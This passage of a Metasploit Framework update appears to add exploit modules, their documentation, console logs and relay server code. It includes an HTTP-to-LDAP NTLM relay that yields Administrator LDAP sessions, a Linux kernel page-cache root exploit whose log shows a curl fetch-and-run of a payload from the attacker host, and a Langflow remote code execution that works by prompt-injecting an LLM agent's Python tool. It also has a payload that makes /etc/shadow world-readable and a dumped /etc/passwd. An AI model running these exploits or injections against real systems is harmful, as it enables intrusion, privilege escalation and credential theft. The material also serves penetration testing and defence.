geoclue:x:114:117::/var/lib/geoclue:/usr/sbin/nologin
cups-browsed:x:115:114::/nonexistent:/usr/sbin/nologin
hplip:x:116:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-remote-desktop:x:988:988:GNOME Remote Desktop:/var/lib/gnome-remote-desktop:/usr/sbin/nologin
polkitd:x:987:987:User for polkitd:/:/usr/sbin/nologin
rtkit:x:117:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
colord:x:118:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
gnome-initial-setup:x:119:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:120:121:Gnome Display Manager:/var/lib/gdm3:/bin/false
nm-openvpn:x:121:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
bittman:x:1000:1000:bittman:/home/bittman:/bin/bash
postgres:x:122:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[*] Auxiliary module execution completed
```
@@ -0,0 +1,108 @@
## Vulnerable Application
### Description
This module sets up an HTTP server that attempts to execute an NTLM relay attack against an LDAP server on the
configured `RHOSTS`. The relay attack targets NTLMv1 authentication, as NTLMv2 cannot be relayed to LDAP due to the
Message Integrity Check (MIC). The module automatically removes the relevant flags to bypass signing.
This module supports relaying one HTTP authentication attempt to multiple LDAP servers. After attempting to relay to
one target, the relay server sends a 307 to the client and if the client is configured to respond to redirects, the
client resends the NTLMSSP_NEGOTIATE request to the relay server. Multi relay will not work if the client does not
respond to redirects.
The module supports relaying NTLM authentication which has been wrapped in GSS-SPNEGO. HTTP authentication info is sent
in the WWW-Authenticate header. In the auth header base64 encoded NTLM messages are denoted with the NTLM prefix, while
GSS wrapped NTLM messages are denoted with the Negotiate prefix. Note that in some cases non-GSS wrapped NTLM auth can
be prefixed with Negotiate.
If the relay attack is successful, an LDAP session is created on the target. This session can be used by other modules
that support LDAP sessions, such as:
- `admin/ldap/rbcd`
- `auxiliary/gather/ldap_query`
The module also supports capturing NTLMv1 and NTLMv2 hashes.
### Setup
For this relay attack to be successful, it is important to understand the difference between the Target Server (the
Domain Controller receiving the relayed authentication) and the Victim Client (the machine sending the initial HTTP
request) and how their respective configurations can impact the success of the attack.
The Domain Controller must be configured to accept LM or NTLM authentication. This means the `LmCompatibilityLevel`
registry key on the DC must be set to 4 or lower. If it is set to `5` ("Send NTLMv2 response only. Refuse
LM and NTLM"), the DC will reject the relayed authentication and the module will fail.
You can verify or modify the Domain Controller's level using the following commands:
```cmd
# To check the current level:
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel
# To set the level to 4 (or lower):
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel /t REG_DWORD /d 0x4 /f
```
The client being coerced must be willing to send the vulnerable NTLM responses.
- Non-Windows Clients: Custom tools or Linux-based HTTP clients are unaffected by Windows registry keys and can easily
be relayed to a vulnerable DC.
- Windows Clients: If you are coercing a native Windows HTTP client (like `Invoke-WebRequest` or a browser), the victim
machine's `LmCompatibilityLevel` dictates what it is allowed to send. To successfully relay a Windows client, its local
registry key typically needs to be set to `2` or lower. If the Windows client is operating at level `3` or higher, it
restricts itself to sending only NTLMv2 responses, which will cause the relay to fail even if the target DC is vulnerable.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/server/relay/http_to_ldap`
3. Set the `RHOSTS` options
4. Run the module
5. Send an authentication attempt to the relay server
6. `Invoke-WebRequest -Uri http://192.0.2.1/test -UseDefaultCredentials`
7. Check the output for successful relays and captured hashes
## Scenarios
### Relaying to multiple targets
```
msf auxiliary(server/relay/http_to_ldap) > set rhosts 172.16.199.200 172.16.199.201
rhosts => 172.16.199.200 172.16.199.201
msf auxiliary(server/relay/http_to_ldap) > run
[*] Auxiliary module running as background job 2.
[*] Relay Server started on 0.0.0.0:80
[*] Server started.
msf auxiliary(server/relay/http_to_ldap) > [*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received Type 1 message from 172.16.199.130, attempting to relay...
[*] Attempting to relay to ldap://172.16.199.201:389
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[*] Received type2 from target ldap://172.16.199.201:389, attempting to relay back to client
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state awaiting_type3 from 172.16.199.130
[*] Received Type 3 message from 172.16.199.130, attempting to relay...
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
[+] Relay succeeded
[*] Moving to next target (172.16.199.200). Issuing 307 Redirect to /ZdF7Ufkm0I
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received Type 1 message from 172.16.199.130, attempting to relay...
[*] Attempting to relay to ldap://172.16.199.200:389
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[*] Received type2 from target ldap://172.16.199.200:389, attempting to relay back to client
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state awaiting_type3 from 172.16.199.130
[*] Received Type 3 message from 172.16.199.130, attempting to relay...
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
[+] Relay succeeded
[*] Target list exhausted for 172.16.199.130. Closing connection.
msf auxiliary(server/relay/http_to_ldap) > sessions -i -1
[*] Starting interaction with 5...
LDAP (172.16.199.200) > getuid
[*] Server username: KERBEROS\Administrator
LDAP (172.16.199.200) >
```
@@ -0,0 +1,80 @@
## Vulnerable Application
CVE-2026-31431 is a logic flaw in the Linux kernel's authencesn AEAD template that, when reached via the
AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled
4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the
on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local
privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as /usr/bin/su.
The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and
affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.
## Verification Steps
1. Obtain a session on an affected Linux host
2. Set the PAYLOAD and related datastore options
3. Run the exploit
## Options
N/A
## Scenarios
### Ubuntu 24.04 x64
```
msf exploit(multi/ssh/sshexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.132:22 - Sending stager...
[*] Command Stager progress - 46.74% done (402/860 bytes)
[*] Sending stage (3090404 bytes) to 192.168.159.132
[*] Meterpreter session 24 opened (192.168.159.128:4444 -> 192.168.159.132:38262) at 2026-04-30 14:50:33 -0400
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (860/860 bytes)
meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer : ubuntu2404
OS : Ubuntu 24.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 24...
msf exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2026_31431_copy_fail
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/local/cve_2026_31431_copy_fail) > set SESSION -1
SESSION => -1
msf exploit(linux/local/cve_2026_31431_copy_fail) > set VERBOSE true
VERBOSE => true
msf exploit(linux/local/cve_2026_31431_copy_fail) > set LPORT 5555
LPORT => 5555
msf exploit(linux/local/cve_2026_31431_copy_fail) > exploit
[*] Command to run on remote host: curl -so ./JVvusljc http://192.168.159.128:8080/dau8JtEFWcUux21CRy4HUQ;chmod +x ./JVvusljc;./JVvusljc&
[*] Fetch handler listening on 192.168.159.128:8080
[*] HTTP server started
[*] Adding resource /dau8JtEFWcUux21CRy4HUQ
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using 'python3' on the remote target.
[+] The exploit socket has been created, encryption primitives are available.
[*] Triggering the vulnerability using Python...
[+] The target is vulnerable.
[*] Triggering the vulnerability using Python...
[*] Client 192.168.159.132 requested /dau8JtEFWcUux21CRy4HUQ
[*] Sending payload to 192.168.159.132 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.159.132
[*] Meterpreter session 25 opened (192.168.159.128:5555 -> 192.168.159.132:48976) at 2026-04-30 14:51:18 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : ubuntu2404
OS : Ubuntu 24.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
@@ -0,0 +1,186 @@
## Vulnerable Application
The CSV Agent node in Langflow hardcodes allow_dangerous_code=True,
which automatically exposes LangChains Python REPL tool (python_repl_ast).
As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection,
leading to full Remote Code Execution (RCE).
The vulnerability affects:
* Langflow < 1.8.0
This module was successfully tested on:
* Langflow 1.7.3 installed with Docker
### Installation
1. `git clone https://github.com/langflow-ai/langflow.git`
2. `git checkout 1.7.3`
3. `cd langflow/docker_example`
4. `Edit docker-compose.yml`
```
services:
langflow:
- image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
- pull_policy: always # set to 'always' when using 'latest' image
+ # image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
+ image: langflowai/langflow:1.7.3 # or another version tag on https://hub.docker.com/r/langflowai/langflow
+ # pull_policy: always # set to 'always' when using 'latest' image
ports:
- "7860:7860"
depends_on:
@@ -11,7 +12,7 @@ services:
# This variable defines where the logs, file storage, monitor data and secret keys are stored.
- LANGFLOW_CONFIG_DIR=/app/langflow
volumes:
- - langflow-data:/app/langflow
+ - langflow-data:/app
postgres:
image: postgres:16
```
5. `docker compose up`
6. `On an attacker machine`
```
curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1
```
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_rce_cve_2026_27966`
4. Do: `run lhost=<lhost> rhost=<rhost> ollamaapiuri=<ollamaapiuri> apikey=<apikey> model=<model>`
5. You should get a meterpreter
## Options
### APIKEY (required)
Langflow API key to interact with Langflow.
### OLLAMAAPIURI (required)
Endpoint of the OLLAMA API controlled by an attacker.
### MODEL (required)
Valid ollama model name.
## Scenarios
### cmd/linux/http/x64/meterpreter_reverse_tcp
```
msf > use exploit/multi/http/langflow_rce_cve_2026_27966
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/langflow_rce_cve_2026_27966) > options
Module options (exploit/multi/http/langflow_rce_cve_2026_27966):
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY yes Langflow API key to interact with Langflow.
MODEL yes Valid ollama model name.
OLLAMAAPIURI yes Endpoint of the OLLAMA API controlled by an attacker.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5h, sapni, socks4, socks5, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 7860 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac
cepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME yVhDYYwMmZm no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payl
oad=cmd/linux/http/x64/meterpreter_reverse_tcp target=Linux\ Command
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
[*] Project: 367f399f-6f17-43a2-bea0-33183baae731
[*] Flow: 42098574-2343-4b8a-97fe-0e2800270087
[*] Job: 014b3154-e882-4649-9c16-5f25e4c358d9
[*] Waiting...
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:59440) at 2026-04-18 12:31:49 +0900
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : d513d5e46402
OS : Debian 13.3 (Linux 6.8.0-56-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### python/meterpreter/reverse_tcp
```
msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payload=python/meterpreter/reverse_tcp target=Python\ payload
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
[*] Project: 146bfdff-95cc-4e43-b0f2-dbdaa6916401
[*] Flow: 497484a7-6f39-4418-8113-aba0c2f57a3b
[*] Job: 0e4282ad-bf9d-4079-891b-81a2ccb8dbe8
[*] Waiting...
[*] Sending stage (23404 bytes) to 192.168.56.16
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:47988) at 2026-04-18 12:48:07 +0900
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : d513d5e46402
OS : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
Architecture : x64
System Language : C
Meterpreter : python/linux
meterpreter >
```
@@ -0,0 +1,69 @@
## Vulnerable Application
This payload targets Linux systems running on the LoongArch64 architecture. It uses the
`fchmodat` syscall (syscall number 53) to change the permissions of a specified file, then
exits cleanly via the `exit` syscall (syscall number 93).
The payload is a 48-byte position-independent shellcode stub. It is suitable for use in
exploits targeting LoongArch64 Linux systems where arbitrary code execution has been achieved.
## Verification Steps
1. Generate the payload as an ELF executable:
```
./msfvenom -p linux/loongarch64/chmod FILE=/tmp/testfile MODE=0777 -f elf -o chmod.elf
chmod +x chmod.elf
```
2. Run it under QEMU user-mode emulation:
```
qemu-loongarch64 -strace ./chmod.elf
```
3. Confirm the `fchmodat` syscall was made and returned 0:
```
fchmodat(AT_FDCWD,"/tmp/testfile",0777,0) = 0
exit(0)
```
4. Verify the file permissions changed:
```
ls -la /tmp/testfile
```
## Options
### FILE
The full path of the file to chmod on the target system. Defaults to `/etc/shadow`.
### MODE
The desired file permissions in octal notation (e.g. `0777`, `0666`, `0644`). Defaults to `0666`.
Must not exceed `0xFFF` (octal `07777`).
## Scenarios
### LoongArch64 Linux — making /etc/shadow world-readable
This scenario demonstrates using the payload to make `/etc/shadow` readable after gaining
code execution on a LoongArch64 Linux target.
#### Version and OS: LoongArch64 Linux (tested with qemu-loongarch64)
Generate the payload:
```
msf6 > use payload/linux/loongarch64/chmod
msf6 payload(linux/loongarch64/chmod) > set FILE /etc/shadow
FILE => /etc/shadow
msf6 payload(linux/loongarch64/chmod) > set MODE 0644
MODE => 0644
msf6 payload(linux/loongarch64/chmod) > generate -f elf -o /tmp/chmod.elf
[*] Writing 168 bytes to /tmp/chmod.elf...
```
Run on target (or via QEMU for testing):
```
$ qemu-loongarch64 -strace /tmp/chmod.elf
fchmodat(AT_FDCWD,"/etc/shadow",0644,0) = 0
exit(0)
```
-6
View File
@@ -6,16 +6,10 @@
#
require 'active_support'
require 'bcrypt'
require 'json'
require 'msgpack'
require 'metasploit/credential'
require 'nokogiri'
# railties has not autorequire defined
# rkelly-remix is a fork of rkelly, so it's autorequire is 'rkelly' and not 'rkelly-remix'
require 'rkelly'
require 'robots'
require 'zip'
require 'msf'
#
# Project
+1 -1
View File
@@ -32,7 +32,7 @@ module Metasploit
end
end
VERSION = "6.4.128"
VERSION = "6.4.132"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash
+4
View File
@@ -175,9 +175,13 @@ protected
begin
begin
job_listener.start run_uuid
mod.check_code = nil if mod.respond_to?(:check_code=)
mod.last_vuln_attempt = nil if mod.respond_to?(:last_vuln_attempt=)
mod.setup
mod.framework.events.on_module_run(mod)
result = block.call(mod)
# Store the check result if the block returned a CheckCode
mod.check_code = result if result.is_a?(Msf::Exploit::CheckCode)
job_listener.completed(run_uuid, result, mod)
rescue ::Exception => e
job_listener.failed(run_uuid, e, mod)
+12
View File
@@ -181,6 +181,18 @@ class Auxiliary < Msf::Module
#
attr_accessor :fail_detail
#
# The result of the last check invocation (a Msf::Exploit::CheckCode), if any
#
attr_accessor :check_code
#
# The VulnAttempt object created during this run, or nil/false if none
# was recorded. Used to prevent duplicate attempts when report_failure
# is called later and to enrich the attempt with check code details.
#
attr_accessor :last_vuln_attempt
attr_accessor :queue
protected
@@ -17,12 +17,20 @@ module Auxiliary::MultipleTargetHosts
end
def check
return Exploit::CheckCode::Unsupported unless has_check?
nmod = replicant
begin
nmod.check_host(datastore['RHOST'])
rescue NoMethodError
Exploit::CheckCode::Unsupported
result = nmod.check_host(datastore['RHOST'])
# Propagate the last_vuln_attempt (which may be the actual VulnAttempt
# object) back from the replicant so that the ensure block in
# job_run_proc (which calls report_failure on the *original* instance)
# knows a vuln attempt was already created and can enrich it directly.
if nmod.respond_to?(:last_vuln_attempt) && nmod.last_vuln_attempt && respond_to?(:last_vuln_attempt=)
self.last_vuln_attempt = nmod.last_vuln_attempt
end
result
end
end
+22 -2
View File
@@ -314,11 +314,31 @@ module Auxiliary::Report
:fail_detail => 'vulnerability identified',
:fail_reason => 'Untried', # Mdm::VulnAttempt::Status::UNTRIED, avoiding direct dependency on Mdm, used elsewhere in this module
:module => mname,
:username => username || "unknown"
:username => username || self.owner || "unknown"
}
# Enrich attempt with check code details when available.
# Accept an explicit check_code in opts (useful when the module knows the
# result before the framework sets self.check_code), falling back to the
# module-level accessor.
check_code = opts[:check_code]
check_code = self.check_code if check_code.nil? && self.respond_to?(:check_code)
if check_code.is_a?(Msf::Exploit::CheckCode)
attempt_info[:check_code] = check_code.code
attempt_info[:check_detail] = check_code.reason || check_code.message
attempt_info[:fail_detail] = nil
mapped_reason = Msf::Module::Failure.fail_reason_from_check_code(check_code)
attempt_info[:fail_reason] = mapped_reason if mapped_reason
end
# TODO: figure out what opts are required and why the above logic doesn't match that of the db_manager method
framework.db.report_vuln_attempt(vuln, attempt_info)
attempt = framework.db.report_vuln_attempt(vuln, attempt_info)
# Store the attempt object so that report_failure (called later by the
# job wrapper) can enrich it directly without re-querying the DB.
if self.respond_to?(:last_vuln_attempt=)
self.last_vuln_attempt = attempt || true
end
vuln
end
+15
View File
@@ -15,6 +15,19 @@ include Msf::Auxiliary::MultipleTargetHosts
class AttemptFailed < Msf::Auxiliary::Failed
end
# Scanner modules handle per-host failure reporting through replicants
# inside their run_host/run_batch threads. Override the default
# report_failure so that the parent-level call from job_run_proc's
# ensure block does not create a duplicate or misattributed attempt
# after a scan. The check path (check_simple) still needs the
# default report_failure behaviour, so we only skip when the scanner's
# run method has executed.
def report_failure
return if @scanner_run_completed
super
end
#
# Initializes an instance of a recon auxiliary module
#
@@ -42,6 +55,7 @@ end
# The command handler when launched from the console
#
def run
@scanner_run_completed = false
@show_progress = datastore['ShowProgress']
@show_percent = datastore['ShowProgressPercent'].to_i
@@ -260,6 +274,7 @@ def run
print_status("Caught interrupt from the console...")
return
ensure
@scanner_run_completed = true
seppuko!()
end
end
+42 -8
View File
@@ -79,9 +79,25 @@ module Msf::DBManager::ExploitAttempt
vuln = nil
if rids.present?
# Try to find an existing vulnerability with the same service & references
# or, if svc is nil, with the same host & references
vuln = find_vuln_by_refs(rids, host, svc, false)
# Only perform vuln lookup when no check_code is present (normal
# exploit flow) or the check result positively indicates vulnerability.
# Safe, Unknown, and Detected results should not associate this attempt
# with an existing vuln. Only key off check_code — fail_reason alone
# is too broad (e.g. Failure::Unknown covers real exploit failures too).
vuln_check_codes = [Msf::Exploit::CheckCode::Appears.code, Msf::Exploit::CheckCode::Vulnerable.code]
if opts[:check_code].nil? || vuln_check_codes.include?(opts[:check_code])
# Try to find an existing vulnerability with the same service & references
# or, if svc is nil, with the same host & references
vuln = find_vuln_by_refs(rids, host, svc, false)
# Fall back to a host-only lookup when the service-scoped query found
# nothing. Only match vulns with no associated service to avoid
# misattributing attempts to a vuln on a different service.
if svc && vuln.nil?
fallback_vuln = find_vuln_by_refs(rids, host, nil, false)
vuln = fallback_vuln if fallback_vuln && fallback_vuln.service_id.nil?
end
end
end
opts[:service] = svc
@@ -158,8 +174,20 @@ module Msf::DBManager::ExploitAttempt
# Create a references map from the module list
ref_objs = ::Mdm::Ref.where(name: ref_names)
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc, false)
# Only perform vuln lookup when no check_code is present (normal
# exploit flow) or the check result positively indicates vulnerability.
# Safe, Unknown, and Detected results should not associate this attempt
# with an existing vuln. Only key off check_code — fail_reason alone
# is too broad (e.g. Failure::Unknown covers real exploit failures too).
vuln_check_codes = [Msf::Exploit::CheckCode::Appears.code, Msf::Exploit::CheckCode::Vulnerable.code]
if opts[:check_code].nil? || vuln_check_codes.include?(opts[:check_code])
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc, false)
if svc && vuln.nil?
fallback_vuln = find_vuln_by_refs(ref_objs, host, nil, false)
vuln = fallback_vuln if fallback_vuln && fallback_vuln.service_id.nil?
end
end
end
attempt_info = {
@@ -170,12 +198,17 @@ module Msf::DBManager::ExploitAttempt
:module => mname,
:username => username || "unknown",
}
attempt_info[:check_code] = opts[:check_code] if opts[:check_code]
attempt_info[:check_detail] = opts[:check_detail] if opts[:check_detail]
attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
# We have match, lets create a vuln_attempt record
if vuln
# We have match, lets create a vuln_attempt record.
# Skip if the caller already recorded a vuln attempt for this run
# (e.g. Auxiliary::Report#report_vuln sets skip_vuln_attempt via
# the last_vuln_attempt flag on the module).
if vuln && !opts[:skip_vuln_attempt]
attempt_info[:vuln_id] = vuln.id
vuln.vuln_attempts.create(attempt_info)
@@ -200,7 +233,8 @@ module Msf::DBManager::ExploitAttempt
attempt_info[:proto] = prot || Msf::DBManager::DEFAULT_SERVICE_PROTO
end
host.exploit_attempts.create(attempt_info)
# check_code and check_detail are valid for VulnAttempt but not ExploitAttempt
host.exploit_attempts.create(attempt_info.except(:check_code, :check_detail))
}
end
-1
View File
@@ -1,4 +1,3 @@
require 'bcrypt'
require 'securerandom'
module Msf::DBManager::User
-2
View File
@@ -2,8 +2,6 @@
module Msf
module Exe
require 'metasm'
class SegmentAppender < SegmentInjector
def payload_stub(prefix)
-2
View File
@@ -2,8 +2,6 @@
module Msf
module Exe
require 'metasm'
class SegmentInjector
attr_accessor :payload
+7
View File
@@ -1493,6 +1493,13 @@ class Exploit < Msf::Module
#
attr_accessor :fail_detail
#
# The VulnAttempt object created during this run, or nil/false if none
# was recorded. Used to prevent duplicate attempts when report_failure
# is called later and to enrich the attempt with check code details.
#
attr_accessor :last_vuln_attempt
#
# The list of targets.
#
+2 -1
View File
@@ -51,7 +51,8 @@ module Exploit::Remote::AutoCheck
name: fullname,
username: respond_to?(:owner) ? owner : nil,
refs: references,
info: description.strip
info: description.strip,
check_code: check_code
}
if respond_to?(:session) && session.respond_to?(:session_host)
@@ -1,7 +1,7 @@
# 3rd party gems
require 'http/cookie_jar/hash_store'
require 'http/cookie_jar'
require 'http/cookie'
require 'http/cookie_jar'
require 'http/cookie_jar/hash_store'
# This class is a collection of Http Cookies with some built in convenience methods.
# Acts as a wrapper for the +::HTTP::CookieJar+ (https://www.rubydoc.info/gems/http-cookie/1.0.2/HTTP/CookieJar) class.
@@ -0,0 +1,109 @@
# -*- coding: binary -*-
# frozen_string_literal: true
module Msf
module Exploit::Remote::HttpServer
module Relay
include ::Msf::Auxiliary::MultipleTargetHosts
include ::Msf::Exploit::Remote::Relay::NTLM::HashCapture
include Msf::Exploit::Remote::HttpServer
attr_reader :logger
def initialize(info = {})
super
register_options(
[
OptPort.new('SRVPORT', [true, 'The local port to listen on.', 80]),
OptAddress.new('SRVHOST', [ true, 'The local host to listen on.', '0.0.0.0' ]),
OptAddressRange.new('RHOSTS', [true, 'Target address range or CIDR identifier to relay to'], aliases: ['LDAPHOST', 'RELAY_TARGETS']),
OptInt.new('RELAY_TIMEOUT', [true, 'Seconds that the relay socket will wait for a response after the client has initiated communication.', 25])
], self.class
)
@relay_clients = {}
@relay_clients_mutex = Mutex.new
end
def start_service(opts = {})
@logger = opts['Logger'] || self
super
@http_relay_service = self.service
relay_path = '/'
add_resource(
'Proc' => Proc.new { |cli, req| on_relay_request(cli, req) },
'Path' => relay_path
)
end
def on_relay_request(cli, req)
client_id = Rex::Socket.to_authority(cli.peerhost, cli.peerport)
cli.keepalive = true
relay_client = nil
print_status("Received #{req.method} request for #{req.uri} from #{client_id}")
# When the 307 redirect is sent to the client, it reconnects on a different port. So the relay server has to keep
# track of the redirect URIs and associate them with the same client session. This allows the state machine to
# continue seamlessly even if the client is bouncing between ports. Tracking the client ports but not redirect
# URI's ends up in an infinite loop of 307 redirects because the client appears to be a new session on each
# request. Tracking the redirect URI's allows us to correlate the new connection with the existing session
# and avoid the redirect loop.
@relay_clients_mutex.synchronize do
# Try to find the client by their exact TCP connection
if @relay_clients.key?(client_id)
relay_client = @relay_clients[client_id]
relay_client.cli = cli
else
previous_client_id = @relay_clients.keys.find { |k| @relay_clients[k].redirect_uri == req.uri && req.uri != '/' }
if previous_client_id
# Seamlessly transfer the state machine from the old port to the new port
relay_client = @relay_clients.delete(previous_client_id)
relay_client.cli = cli
@relay_clients[client_id] = relay_client
else
# This is a truly new client session
relay_client = Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient.new(
cli,
relay_targets,
logger,
datastore['RELAY_TIMEOUT']
)
relay_client.redirect_uri = req.uri # Track their starting path
@relay_clients[client_id] = relay_client
end
end
end
relay_client.process_request(req)
@relay_clients_mutex.synchronize do
if relay_client.finished? && @relay_clients[client_id].equal?(relay_client)
@relay_clients.delete(client_id)
end
end
end
def send_auth_challenge(cli)
res = Rex::Proto::Http::Response.new
res.code = 401
res.message = "Unauthorized"
res.headers['WWW-Authenticate'] = "NTLM"
cli.put(res.to_s)
end
def cleanup
if @http_relay_service
@http_relay_service.remove_resource('/')
Rex::ServiceManager.stop_service(@http_relay_service)
end
super
end
end
end
end
@@ -0,0 +1,374 @@
# frozen_string_literal: true
module Msf::Exploit::Remote::HttpServer::Relay::NTLM
class ServerClient
attr_reader :logger
attr_accessor :cli, :state, :redirect_uri
def initialize(cli, relay_targets, logger, timeout = 25)
@cli = cli
@state = :unauthenticated
@relay_targets = relay_targets
@logger = logger
@timeout = timeout
@relayed_connection = nil
@current_target = nil
@ntlm_context = {
wrapper: :none,
type1: nil,
type2: nil
}
end
def process_request(req)
logger.print_status("Processing request in state #{state} from #{cli.peerhost}")
auth_header = req.headers['Authorization']
auth_type, b64_message = extract_ntlm_message(auth_header)
parsed_ntlm = nil
raw_ntlm_bytes = nil
if b64_message
begin
raw_ntlm_bytes = unwrap_ntlm_base64(b64_message)
parsed_ntlm = Net::NTLM::Message.parse(raw_ntlm_bytes)
rescue ::Exception => e
logger.print_error("Failed to parse incoming NTLM/SPNEGO message: #{e.message}")
abort_connection("Invalid NTLM payload.")
return
end
end
case state
when :unauthenticated
if parsed_ntlm.nil?
send_401_challenge
elsif parsed_ntlm.is_a?(Net::NTLM::Message::Type1)
logger.print_status("Received Type 1 message from #{cli.peerhost}, attempting to relay...")
handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
else
abort_connection("Expected No Auth or Type 1, got something else.")
end
when :awaiting_type3
if parsed_ntlm && parsed_ntlm.is_a?(Net::NTLM::Message::Type3)
logger.print_status("Received Type 3 message from #{cli.peerhost}, attempting to relay...")
handle_type3(parsed_ntlm)
elsif parsed_ntlm && parsed_ntlm.is_a?(Net::NTLM::Message::Type1)
logger.print_warning("Client restarted the handshake! Resetting state to handle new Type 1...")
@relayed_connection.disconnect! if @relayed_connection
@relayed_connection = nil
handle_type1(raw_ntlm_bytes, parsed_ntlm, auth_type)
else
abort_connection("Expected Type 3, got something else.")
end
when :done
# The relay is finished for this connection, ignore further requests
end
end
